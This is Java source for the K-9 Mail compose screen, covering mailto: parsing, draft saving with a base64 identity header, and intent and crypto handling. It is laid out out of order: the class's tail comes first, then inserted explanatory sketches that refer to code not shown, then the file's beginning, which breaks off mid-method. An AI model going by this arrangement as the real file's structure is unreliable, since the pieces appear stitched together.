run() { processSourceMessage(message); } }); } @Override public void loadMessageForViewFailed(Account account, String folder, String uid, Throwable t) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); // TODO show network error } @Override public void messageUidChanged(Account account, String folder, String oldUid, String newUid) { //TODO: is this really necessary here? mDraftUid is update after the call to MessagingController.saveDraft() // Track UID changes of the draft message if (account.equals(mAccount) && folder.equals(mAccount.getDraftsFolderName()) && oldUid.equals(mDraftUid)) { mDraftUid = newUid; } // Track UID changes of the source message if (mMessageReference != null) { final Account sourceAccount = Preferences.getPreferences(MessageCompose.this).getAccount(mMessageReference.accountUuid); final String sourceFolder = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; if (account.equals(sourceAccount) && (folder.equals(sourceFolder))) { if (oldUid.equals(sourceMessageUid)) { mMessageReference.uid = newUid; } if ((mSourceMessage != null) && (oldUid.equals(mSourceMessage.getUid()))) { mSourceMessage.setUid(newUid); } } } } } private String decode(String s) throws UnsupportedEncodingException { return URLDecoder.decode(s, "UTF-8"); } /** * When we are launched with an intent that includes a mailto: URI, we can actually * gather quite a few of our message fields from it. * * @mailToString the href (which must start with "mailto:"). */ private void initializeFromMailTo(String mailToString) { // Chop up everything between mailto: and ? 
to find recipients int index = mailToString.indexOf("?"); int length = "mailto".length() + 1; String to; try { // Extract the recipient after mailto: if (index == -1) { to = decode(mailToString.substring(length)); } else { to = decode(mailToString.substring(length, index)); } mToView.setText(to); } catch (UnsupportedEncodingException e) { Log.e(K9.LOG_TAG, e.getMessage() + " while decoding '" + mailToString + "'"); } // Extract the other parameters // We need to disguise this string as a URI in order to parse it Uri uri = Uri.parse("foo://" + mailToString); String addressList; addressList = ""; List<String> cc = uri.getQueryParameters("cc"); for (String address : cc) { addressList += address + ","; } mCcView.setText(addressList); addressList = ""; List<String> bcc = uri.getQueryParameters("bcc"); for (String address : bcc) { addressList += address + ","; } mBccView.setText(addressList); List<String> subject = uri.getQueryParameters("subject"); if (subject.size() > 0) { mSubjectView.setText(subject.get(0)); } List<String> body = uri.getQueryParameters("body"); if (body.size() > 0) { mMessageContentView.setText(body.get(0)); } } private class SendMessageTask extends AsyncTask<Void, Void, Void> { @Override protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(true); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } MessagingController.getInstance(getApplication()).sendMessage(mAccount, message, null); if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } return null; } } private class SaveMessageTask extends AsyncTask<Void, Void, Void> { @Override protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(false); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } /* * Save a draft */ if (mDraftUid != null) { message.setUid(mDraftUid); } else if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { /* * We're saving a previously saved draft, so update the new message's uid * to the old message's uid. */ message.setUid(mMessageReference.uid); } String k9identity = Utility.base64Encode("" + mMessageContentView.getText().toString().length()); if (mIdentityChanged || mSignatureChanged) { String signature = mSignatureView.getText().toString(); k9identity += ":" + Utility.base64Encode(signature); if (mIdentityChanged) { String name = mIdentity.getName(); String email = mIdentity.getEmail(); k9identity += ":" + Utility.base64Encode(name) + ":" + Utility.base64Encode(email); } } if (K9.DEBUG) Log.d(K9.LOG_TAG, "Saving identity: " + k9identity); message.addHeader(K9.K9MAIL_IDENTITY, k9identity); Message draftMessage = MessagingController.getInstance(getApplication()).saveDraft(mAccount, message); mDraftUid = draftMessage.getUid(); // Don't display the toast if the user is just changing the orientation if ((getChangingConfigurations() & ActivityInfo.CONFIG_ORIENTATION) == 0) { mHandler.sendEmptyMessage(MSG_SAVED_DRAFT); } return null; } } }
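The SaveMessageTask and processSourceMessage(ACTION_EDIT_DRAFT) code above round-trips draft metadata (body length, signature, name, email) through the K9.K9MAIL_IDENTITY header as colon-separated, individually base64-encoded tokens, so a ':' or a newline inside a signature can never break the tokenizer. The following is a minimal standalone sketch of that format, illustrative only and not part of MessageCompose.java; it assumes java.util.Base64 as a stand-in for the app's com.fsck.k9.helper.Utility.base64Encode/base64Decode helpers so it compiles on its own.

// DraftIdentityHeaderSketch.java -- illustrative sketch, not part of the K-9 sources.
// Mirrors the colon-separated, per-token base64 layout that SaveMessageTask writes
// into the K9.K9MAIL_IDENTITY header and that processSourceMessage() tokenizes back.
// Assumption: java.util.Base64 stands in for Utility.base64Encode/base64Decode.
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.StringTokenizer;

public class DraftIdentityHeaderSketch {
    /** Encode the body length plus optional signature/name/email, one base64 token each. */
    static String encode(int bodyLength, String signature, String name, String email) {
        StringBuilder header = new StringBuilder(b64(Integer.toString(bodyLength)));
        if (signature != null) {
            header.append(':').append(b64(signature));
            if (name != null && email != null) {
                header.append(':').append(b64(name)).append(':').append(b64(email));
            }
        }
        return header.toString();
    }

    /** Tokenize on ':' and decode; base64 guarantees no token contains a raw ':'. */
    static void decode(String header) {
        StringTokenizer tokens = new StringTokenizer(header, ":", false);
        String[] labels = { "bodyLength", "signature", "name", "email" };
        for (String label : labels) {
            if (!tokens.hasMoreTokens()) {
                break;
            }
            System.out.println(label + " = " + unb64(tokens.nextToken()));
        }
    }

    private static String b64(String s) {
        return Base64.getEncoder().encodeToString(s.getBytes(StandardCharsets.UTF_8));
    }

    private static String unb64(String s) {
        return new String(Base64.getDecoder().decode(s), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Hypothetical values, just to show the round trip.
        String header = encode(42, "-- \nAlice", "Alice", "alice@example.org");
        System.out.println(header);
        decode(header);
    }
}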
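processSourceMessage() also escapes "$" and "\" in the user-configured quote prefix before handing it to String.replaceAll(), because in a replacement string "$1" is a group reference and "\" starts an escape, so an unescaped literal "$" would throw. Below is a tiny sketch of just that step, with a hypothetical prefix value; Matcher.quoteReplacement() is shown as an equivalent library alternative, not what the source uses.

// QuotePrefixSketch.java -- illustrative sketch, not part of the K-9 sources.
// Shows why the quote prefix is escaped before being used as a replaceAll()
// replacement: an unescaped "$" would be read as a group reference.
import java.util.regex.Matcher;

public class QuotePrefixSketch {
    public static void main(String[] args) {
        String prefix = "$> ";   // hypothetical user-configured prefix containing '$'
        // Same escaping expression as in processSourceMessage(): prepend '\' to '\' and '$'.
        String escapedPrefix = prefix.replaceAll("(\\\\|\\$)", "\\\\$1");
        String body = "first quoted line\nsecond quoted line";
        // "(?m)^" matches the start of every line, so each line receives the prefix.
        System.out.println(body.replaceAll("(?m)^", escapedPrefix));
        // Equivalent escaping via the standard library:
        System.out.println(body.replaceAll("(?m)^", Matcher.quoteReplacement(prefix)));
    }
}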
src/com/fsck/k9/activity/MessageCompose.java
package com.fsck.k9.activity; import java.io.File; import java.io.Serializable; import java.io.UnsupportedEncodingException; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.StringTokenizer; import org.apache.james.mime4j.codec.EncoderUtil; import android.app.AlertDialog; import android.app.Dialog; import android.content.ContentResolver; import android.content.Context; import android.content.DialogInterface; import android.content.Intent; import android.content.pm.ActivityInfo; import android.database.Cursor; import android.net.Uri; import android.os.AsyncTask; import android.os.Bundle; import android.os.Handler; import android.os.Parcelable; import android.provider.OpenableColumns; import android.text.TextWatcher; import android.text.util.Rfc822Tokenizer; import android.util.Log; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.View.OnClickListener; import android.view.View.OnFocusChangeListener; import android.view.Window; import android.widget.AutoCompleteTextView.Validator; import android.widget.Button; import android.widget.CheckBox; import android.widget.EditText; import android.widget.ImageButton; import android.widget.LinearLayout; import android.widget.MultiAutoCompleteTextView; import android.widget.TextView; import android.widget.Toast; import com.fsck.k9.Account; import com.fsck.k9.EmailAddressAdapter; import com.fsck.k9.EmailAddressValidator; import com.fsck.k9.Identity; import com.fsck.k9.K9; import com.fsck.k9.Preferences; import com.fsck.k9.R; import com.fsck.k9.controller.MessagingController; import com.fsck.k9.controller.MessagingListener; import com.fsck.k9.crypto.CryptoProvider; import com.fsck.k9.helper.Utility; import com.fsck.k9.mail.Address; import com.fsck.k9.mail.Body; import com.fsck.k9.mail.Flag; import com.fsck.k9.mail.Message; import com.fsck.k9.mail.Message.RecipientType; import com.fsck.k9.mail.MessagingException; import com.fsck.k9.mail.Multipart; import com.fsck.k9.mail.Part; import com.fsck.k9.mail.internet.MimeBodyPart; import com.fsck.k9.mail.internet.MimeHeader; import com.fsck.k9.mail.internet.MimeMessage; import com.fsck.k9.mail.internet.MimeMultipart; import com.fsck.k9.mail.internet.MimeUtility; import com.fsck.k9.mail.internet.TextBody; import com.fsck.k9.mail.store.LocalStore; import com.fsck.k9.mail.store.LocalStore.LocalAttachmentBody; public class MessageCompose extends K9Activity implements OnClickListener, OnFocusChangeListener { private static final int DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE = 1; private static final String ACTION_REPLY = "com.fsck.k9.intent.action.REPLY"; private static final String ACTION_REPLY_ALL = "com.fsck.k9.intent.action.REPLY_ALL"; private static final String ACTION_FORWARD = "com.fsck.k9.intent.action.FORWARD"; private static final String ACTION_EDIT_DRAFT = "com.fsck.k9.intent.action.EDIT_DRAFT"; private static final String EXTRA_ACCOUNT = "account"; private static final String EXTRA_MESSAGE_BODY = "messageBody"; private static final String EXTRA_MESSAGE_REFERENCE = "message_reference"; private static final String STATE_KEY_ATTACHMENTS = "com.fsck.k9.activity.MessageCompose.attachments"; private static final String STATE_KEY_CC_SHOWN = "com.fsck.k9.activity.MessageCompose.ccShown"; private static final String STATE_KEY_BCC_SHOWN = "com.fsck.k9.activity.MessageCompose.bccShown"; private static final String STATE_KEY_QUOTED_TEXT_SHOWN = 
"com.fsck.k9.activity.MessageCompose.quotedTextShown"; private static final String STATE_KEY_SOURCE_MESSAGE_PROCED = "com.fsck.k9.activity.MessageCompose.stateKeySourceMessageProced"; private static final String STATE_KEY_DRAFT_UID = "com.fsck.k9.activity.MessageCompose.draftUid"; private static final String STATE_IDENTITY_CHANGED = "com.fsck.k9.activity.MessageCompose.identityChanged"; private static final String STATE_IDENTITY = "com.fsck.k9.activity.MessageCompose.identity"; private static final String STATE_CRYPTO = "crypto"; private static final String STATE_IN_REPLY_TO = "com.fsck.k9.activity.MessageCompose.inReplyTo"; private static final String STATE_REFERENCES = "com.fsck.k9.activity.MessageCompose.references"; private static final int MSG_PROGRESS_ON = 1; private static final int MSG_PROGRESS_OFF = 2; private static final int MSG_UPDATE_TITLE = 3; private static final int MSG_SKIPPED_ATTACHMENTS = 4; private static final int MSG_SAVED_DRAFT = 5; private static final int MSG_DISCARDED_DRAFT = 6; private static final int ACTIVITY_REQUEST_PICK_ATTACHMENT = 1; private static final int ACTIVITY_CHOOSE_IDENTITY = 2; private static final int ACTIVITY_CHOOSE_ACCOUNT = 3; /** * The account used for message composition. */ private Account mAccount; /** * This identity's settings are used for message composition. * Note: This has to be an identity of the account {@link #mAccount}. */ private Identity mIdentity; private boolean mIdentityChanged = false; private boolean mSignatureChanged = false; /** * Reference to the source message (in case of reply, forward, or edit * draft actions). */ private MessageReference mMessageReference; private Message mSourceMessage; private String mSourceMessageBody; /** * Indicates that the source message has been processed at least once and should not * be processed on any subsequent loads. This protects us from adding attachments that * have already been added from the restore of the view state. */ private boolean mSourceMessageProcessed = false; private TextView mFromView; private MultiAutoCompleteTextView mToView; private MultiAutoCompleteTextView mCcView; private MultiAutoCompleteTextView mBccView; private EditText mSubjectView; private EditText mSignatureView; private EditText mMessageContentView; private LinearLayout mAttachments; private View mQuotedTextBar; private ImageButton mQuotedTextDelete; private EditText mQuotedText; private View mEncryptLayout; private CheckBox mCryptoSignatureCheckbox; private CheckBox mEncryptCheckbox; private TextView mCryptoSignatureUserId; private TextView mCryptoSignatureUserIdRest; private CryptoProvider mCrypto = null; private String mReferences; private String mInReplyTo; private boolean mDraftNeedsSaving = false; private boolean mPreventDraftSaving = false; /** * The draft uid of this message. This is used when saving drafts so that the same draft is * overwritten instead of being created anew. This property is null until the first save. 
*/ private String mDraftUid; private Handler mHandler = new Handler() { @Override public void handleMessage(android.os.Message msg) { switch (msg.what) { case MSG_PROGRESS_ON: setProgressBarIndeterminateVisibility(true); break; case MSG_PROGRESS_OFF: setProgressBarIndeterminateVisibility(false); break; case MSG_UPDATE_TITLE: updateTitle(); break; case MSG_SKIPPED_ATTACHMENTS: Toast.makeText( MessageCompose.this, getString(R.string.message_compose_attachments_skipped_toast), Toast.LENGTH_LONG).show(); break; case MSG_SAVED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_saved_toast), Toast.LENGTH_LONG).show(); break; case MSG_DISCARDED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_discarded_toast), Toast.LENGTH_LONG).show(); break; default: super.handleMessage(msg); break; } } }; private Listener mListener = new Listener(); private EmailAddressAdapter mAddressAdapter; private Validator mAddressValidator; class Attachment implements Serializable { public String name; public String contentType; public long size; public Uri uri; } /** * Compose a new message using the given account. If account is null the default account * will be used. * @param context * @param account */ public static void actionCompose(Context context, Account account) { if (account == null) { account = Preferences.getPreferences(context).getDefaultAccount(); } Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_ACCOUNT, account.getUuid()); context.startActivity(i); } /** * Compose a new message as a reply to the given message. If replyAll is true the function * is reply all instead of simply reply. * @param context * @param account * @param message * @param replyAll * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionReply( Context context, Account account, Message message, boolean replyAll, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); if (replyAll) { i.setAction(ACTION_REPLY_ALL); } else { i.setAction(ACTION_REPLY); } context.startActivity(i); } /** * Compose a new message as a forward of the given message. * @param context * @param account * @param message * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionForward( Context context, Account account, Message message, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_FORWARD); context.startActivity(i); } /** * Continue composition of the given message. This action modifies the way this Activity * handles certain actions. * Save will attempt to replace the message in the given folder with the updated version. * Discard will delete the message from the given folder. 
* @param context * @param account * @param folder * @param message */ public static void actionEditDraft(Context context, Account account, Message message) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_EDIT_DRAFT); context.startActivity(i); } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); setContentView(R.layout.message_compose); final Intent intent = getIntent(); mMessageReference = (MessageReference) intent.getSerializableExtra(EXTRA_MESSAGE_REFERENCE); mSourceMessageBody = (String) intent.getStringExtra(EXTRA_MESSAGE_BODY); final String accountUuid = (mMessageReference != null) ? mMessageReference.accountUuid : intent.getStringExtra(EXTRA_ACCOUNT); mAccount = Preferences.getPreferences(this).getAccount(accountUuid); if (mAccount == null) { mAccount = Preferences.getPreferences(this).getDefaultAccount(); } if (mAccount == null) { /* * There are no accounts set up. This should not have happened. Prompt the * user to set up an account as an acceptable bailout. */ startActivity(new Intent(this, Accounts.class)); mDraftNeedsSaving = false; finish(); return; } mAddressAdapter = EmailAddressAdapter.getInstance(this); mAddressValidator = new EmailAddressValidator(); mFromView = (TextView)findViewById(R.id.from); mToView = (MultiAutoCompleteTextView)findViewById(R.id.to); mCcView = (MultiAutoCompleteTextView)findViewById(R.id.cc); mBccView = (MultiAutoCompleteTextView)findViewById(R.id.bcc); mSubjectView = (EditText)findViewById(R.id.subject); EditText upperSignature = (EditText)findViewById(R.id.upper_signature); EditText lowerSignature = (EditText)findViewById(R.id.lower_signature); mMessageContentView = (EditText)findViewById(R.id.message_content); mAttachments = (LinearLayout)findViewById(R.id.attachments); mQuotedTextBar = findViewById(R.id.quoted_text_bar); mQuotedTextDelete = (ImageButton)findViewById(R.id.quoted_text_delete); mQuotedText = (EditText)findViewById(R.id.quoted_text); TextWatcher watcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; } public void afterTextChanged(android.text.Editable s) { } }; TextWatcher sigwatcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; mSignatureChanged = true; } public void afterTextChanged(android.text.Editable s) { } }; mToView.addTextChangedListener(watcher); mCcView.addTextChangedListener(watcher); mBccView.addTextChangedListener(watcher); mSubjectView.addTextChangedListener(watcher); mMessageContentView.addTextChangedListener(watcher); mQuotedText.addTextChangedListener(watcher); /* * We set this to invisible by default. Other methods will turn it back on if it's * needed. 
*/ mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mQuotedTextDelete.setOnClickListener(this); mFromView.setVisibility(View.GONE); mToView.setAdapter(mAddressAdapter); mToView.setTokenizer(new Rfc822Tokenizer()); mToView.setValidator(mAddressValidator); mCcView.setAdapter(mAddressAdapter); mCcView.setTokenizer(new Rfc822Tokenizer()); mCcView.setValidator(mAddressValidator); mBccView.setAdapter(mAddressAdapter); mBccView.setTokenizer(new Rfc822Tokenizer()); mBccView.setValidator(mAddressValidator); mSubjectView.setOnFocusChangeListener(this); if (savedInstanceState != null) { /* * This data gets used in onCreate, so grab it here instead of onRestoreIntstanceState */ mSourceMessageProcessed = savedInstanceState.getBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, false); } String action = intent.getAction(); if (Intent.ACTION_VIEW.equals(action) || Intent.ACTION_SENDTO.equals(action)) { /* * Someone has clicked a mailto: link. The address is in the URI. */ if (intent.getData() != null) { Uri uri = intent.getData(); if ("mailto".equals(uri.getScheme())) { initializeFromMailTo(uri.toString()); } else { String toText = uri.getSchemeSpecificPart(); if (toText != null) { mToView.setText(toText); } } } } //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support else if (Intent.ACTION_SEND.equals(action) || Intent.ACTION_SENDTO.equals(action) || "android.intent.action.SEND_MULTIPLE".equals(action)) { /* * Someone is trying to compose an email with an attachment, probably Pictures. * The Intent should contain an EXTRA_STREAM with the data to attach. */ String text = intent.getStringExtra(Intent.EXTRA_TEXT); if (text != null) { mMessageContentView.setText(text); } String subject = intent.getStringExtra(Intent.EXTRA_SUBJECT); if (subject != null) { mSubjectView.setText(subject); } String type = intent.getType(); //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support if ("android.intent.action.SEND_MULTIPLE".equals(action)) { ArrayList<Parcelable> list = intent.getParcelableArrayListExtra(Intent.EXTRA_STREAM); if (list != null) { for (Parcelable parcelable : list) { Uri stream = (Uri) parcelable; if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } } } else { Uri stream = (Uri) intent.getParcelableExtra(Intent.EXTRA_STREAM); if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } /* * There might be an EXTRA_SUBJECT, EXTRA_TEXT, EXTRA_EMAIL, EXTRA_BCC or EXTRA_CC */ String extraSubject = intent.getStringExtra(Intent.EXTRA_SUBJECT); String extraText = intent.getStringExtra(Intent.EXTRA_TEXT); mSubjectView.setText(extraSubject); mMessageContentView.setText(extraText); String[] extraEmail = intent.getStringArrayExtra(Intent.EXTRA_EMAIL); String[] extraCc = intent.getStringArrayExtra(Intent.EXTRA_CC); String[] extraBcc = intent.getStringArrayExtra(Intent.EXTRA_BCC); String addressList; // Cache array size, as per Google's recommendations. 
int arraySize; int i; addressList = ""; if (extraEmail != null) { arraySize = extraEmail.length; for (i=0; i < arraySize; i++) { addressList += extraEmail[i]+", "; } } mToView.setText(addressList); addressList = ""; if (extraCc != null) { arraySize = extraCc.length; for (i=0; i < arraySize; i++) { addressList += extraCc[i]+", "; } } mCcView.setText(addressList); addressList = ""; if (extraBcc != null) { arraySize = extraBcc.length; for (i=0; i < arraySize; i++) { addressList += extraBcc[i]+", "; } } mBccView.setText(addressList); } if (mIdentity == null) { mIdentity = mAccount.getIdentity(0); } if (mAccount.isSignatureBeforeQuotedText()) { mSignatureView = upperSignature; lowerSignature.setVisibility(View.GONE); } else { mSignatureView = lowerSignature; upperSignature.setVisibility(View.GONE); } mSignatureView.addTextChangedListener(sigwatcher); if (!mIdentity.getSignatureUse()) { mSignatureView.setVisibility(View.GONE); } if (!mSourceMessageProcessed) { updateFrom(); updateSignature(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_FORWARD.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { /* * If we need to load the message we add ourself as a message listener here * so we can kick it off. Normally we add in onResume but we don't * want to reload the message every time the activity is resumed. * There is no harm in adding twice. */ MessagingController.getInstance(getApplication()).addListener(mListener); final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).loadMessageForView(account, folderName, sourceMessageUid, null); } if (!ACTION_EDIT_DRAFT.equals(action)) { String bccAddress = mAccount.getAlwaysBcc(); if ((bccAddress != null) && !("".equals(bccAddress))) { addAddress(mBccView, new Address(bccAddress, "")); } } /* if (K9.DEBUG) Log.d(K9.LOG_TAG, "action = " + action + ", account = " + mMessageReference.accountUuid + ", folder = " + mMessageReference.folderName + ", sourceMessageUid = " + mMessageReference.uid); */ if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Setting message ANSWERED flag to true"); // TODO: Really, we should wait until we send the message, but that would require saving the original // message info along with a Draft copy, in case it is left in Drafts for a while before being sent final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).setFlag(account, folderName, new String[] { sourceMessageUid }, Flag.ANSWERED, true); } updateTitle(); } if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { //change focus to message body. 
mMessageContentView.requestFocus(); } mEncryptLayout = (View)findViewById(R.id.layout_encrypt); mCryptoSignatureCheckbox = (CheckBox)findViewById(R.id.cb_crypto_signature); mCryptoSignatureUserId = (TextView)findViewById(R.id.userId); mCryptoSignatureUserIdRest = (TextView)findViewById(R.id.userIdRest); mEncryptCheckbox = (CheckBox)findViewById(R.id.cb_encrypt); initializeCrypto(); if (mCrypto.isAvailable(this)) { mEncryptLayout.setVisibility(View.VISIBLE); mCryptoSignatureCheckbox.setOnClickListener(new OnClickListener() { @Override public void onClick(View v) { CheckBox checkBox = (CheckBox) v; if (checkBox.isChecked()) { mPreventDraftSaving = true; if (!mCrypto.selectSecretKey(MessageCompose.this)) { mPreventDraftSaving = false; } checkBox.setChecked(false); } else { mCrypto.setSignatureKeyId(0); updateEncryptLayout(); } } }); if (mAccount.getCryptoAutoSignature()) { long ids[] = mCrypto.getSecretKeyIdsFromEmail(this, mIdentity.getEmail()); if (ids != null && ids.length > 0) { mCrypto.setSignatureKeyId(ids[0]); mCrypto.setSignatureUserId(mCrypto.getUserId(this, ids[0])); } else { mCrypto.setSignatureKeyId(0); mCrypto.setSignatureUserId(null); } } updateEncryptLayout(); } else { mEncryptLayout.setVisibility(View.GONE); } mDraftNeedsSaving = false; } private void initializeCrypto() { if (mCrypto != null) { return; } mCrypto = CryptoProvider.createInstance(mAccount); } /** * Fill the encrypt layout with the latest data about signature key and encryption keys. */ public void updateEncryptLayout() { if (!mCrypto.hasSignatureKey()) { mCryptoSignatureCheckbox.setText(R.string.btn_crypto_sign); mCryptoSignatureCheckbox.setChecked(false); mCryptoSignatureUserId.setVisibility(View.INVISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.INVISIBLE); } else { // if a signature key is selected, then the checkbox itself has no text mCryptoSignatureCheckbox.setText(""); mCryptoSignatureCheckbox.setChecked(true); mCryptoSignatureUserId.setVisibility(View.VISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.VISIBLE); mCryptoSignatureUserId.setText(R.string.unknown_crypto_signature_user_id); mCryptoSignatureUserIdRest.setText(""); String userId = mCrypto.getSignatureUserId(); if (userId == null) { userId = mCrypto.getUserId(this, mCrypto.getSignatureKeyId()); mCrypto.setSignatureUserId(userId); } if (userId != null) { String chunks[] = mCrypto.getSignatureUserId().split(" <", 2); mCryptoSignatureUserId.setText(chunks[0]); if (chunks.length > 1) { mCryptoSignatureUserIdRest.setText("<" + chunks[1]); } } } } @Override public void onResume() { super.onResume(); MessagingController.getInstance(getApplication()).addListener(mListener); } @Override public void onPause() { super.onPause(); saveIfNeeded(); MessagingController.getInstance(getApplication()).removeListener(mListener); } /** * The framework handles most of the fields, but we need to handle stuff that we * dynamically show and hide: * Attachment list, * Cc field, * Bcc field, * Quoted text, */ @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); saveIfNeeded(); ArrayList<Uri> attachments = new ArrayList<Uri>(); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { View view = mAttachments.getChildAt(i); Attachment attachment = (Attachment) view.getTag(); attachments.add(attachment.uri); } outState.putParcelableArrayList(STATE_KEY_ATTACHMENTS, attachments); outState.putBoolean(STATE_KEY_CC_SHOWN, mCcView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_BCC_SHOWN, 
mBccView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_QUOTED_TEXT_SHOWN, mQuotedTextBar.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, mSourceMessageProcessed); outState.putString(STATE_KEY_DRAFT_UID, mDraftUid); outState.putSerializable(STATE_IDENTITY, mIdentity); outState.putBoolean(STATE_IDENTITY_CHANGED, mIdentityChanged); outState.putSerializable(STATE_CRYPTO, mCrypto); outState.putString(STATE_IN_REPLY_TO, mInReplyTo); outState.putString(STATE_REFERENCES, mReferences); } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); ArrayList<Parcelable> attachments = (ArrayList<Parcelable>) savedInstanceState.getParcelableArrayList(STATE_KEY_ATTACHMENTS); mAttachments.removeAllViews(); for (Parcelable p : attachments) { Uri uri = (Uri) p; addAttachment(uri); } mCcView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_CC_SHOWN) ? View.VISIBLE : View.GONE); mBccView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_BCC_SHOWN) ? View.VISIBLE : View.GONE); mQuotedTextBar.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mQuotedText.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mDraftUid = savedInstanceState.getString(STATE_KEY_DRAFT_UID); mIdentity = (Identity)savedInstanceState.getSerializable(STATE_IDENTITY); mIdentityChanged = savedInstanceState.getBoolean(STATE_IDENTITY_CHANGED); mCrypto = (CryptoProvider) savedInstanceState.getSerializable(STATE_CRYPTO); mInReplyTo = savedInstanceState.getString(STATE_IN_REPLY_TO); mReferences = savedInstanceState.getString(STATE_REFERENCES); initializeCrypto(); updateFrom(); updateSignature(); updateEncryptLayout(); mDraftNeedsSaving = false; } private void updateTitle() { if (mSubjectView.getText().length() == 0) { setTitle(R.string.compose_title); } else { setTitle(mSubjectView.getText().toString()); } } public void onFocusChange(View view, boolean focused) { if (!focused) { updateTitle(); } } private void addAddresses(MultiAutoCompleteTextView view, Address[] addresses) { if (addresses == null) { return; } for (Address address : addresses) { addAddress(view, address); } } private void addAddress(MultiAutoCompleteTextView view, Address address) { view.append(address + ", "); } private Address[] getAddresses(MultiAutoCompleteTextView view) { Address[] addresses = Address.parseUnencoded(view.getText().toString().trim()); return addresses; } private String buildText(boolean appendSig) { /* * Build the Body that will contain the text of the message. We'll decide where to * include it later. 
*/ String text = mMessageContentView.getText().toString(); if (appendSig && mAccount.isSignatureBeforeQuotedText()) { text = appendSignature(text); } if (mQuotedTextBar.getVisibility() == View.VISIBLE) { text += "\n" + mQuotedText.getText().toString(); } if (appendSig && mAccount.isSignatureBeforeQuotedText() == false) { text = appendSignature(text); } return text; } private MimeMessage createMessage(boolean appendSig) throws MessagingException { MimeMessage message = new MimeMessage(); message.addSentDate(new Date()); Address from = new Address(mIdentity.getEmail(), mIdentity.getName()); message.setFrom(from); message.setRecipients(RecipientType.TO, getAddresses(mToView)); message.setRecipients(RecipientType.CC, getAddresses(mCcView)); message.setRecipients(RecipientType.BCC, getAddresses(mBccView)); message.setSubject(mSubjectView.getText().toString()); message.setHeader("X-User-Agent", getString(R.string.message_header_mua)); final String replyTo = mIdentity.getReplyTo(); if (replyTo != null) { message.setReplyTo(new Address[] { new Address(replyTo) }); } if (mInReplyTo != null) { message.setInReplyTo(mInReplyTo); } if (mReferences != null) { 